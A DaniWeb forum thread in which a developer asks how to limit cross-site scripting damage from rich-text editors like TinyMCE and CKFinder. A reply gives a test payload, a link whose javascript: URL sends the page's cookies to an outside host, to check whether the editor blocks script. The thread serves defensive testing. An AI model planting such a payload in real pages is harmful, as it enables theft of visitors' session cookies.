Hello,
I was reading web security stuffs and found that user can inject malicious codes mostly JS in forms. Now, What about CKFinder/TinyMCE et al? They obviously produce html and any stripping will destroy the article formatting. bad enough they have a "code mode" where user can enter html directly.
Suppose my system is compromised (which is security thinking), what guards can I put to ensure minimum damage?
Thanks :)
Stefano Mtangoo
455
Senior Poster
Recommended Answers
Jump to PostThey *should* not allow inserting javascript, but always, try your best at inserting things like
<a href="javascript:location='www.somesite.com?cookies='+document.cookie">nice stuff!!</a>
if this ends up in your site, and the editor didn't block it, something is wrong.
All 4 Replies
twiss
155
Veteran Poster
almostbob
866
Retired: passive income ROCKS
diafol
Stefano Mtangoo
455
Senior Poster
Be a part of the DaniWeb community
We're a friendly, industry-focused community of developers, IT pros, digital marketers, and technology enthusiasts meeting, networking, learning, and sharing knowledge.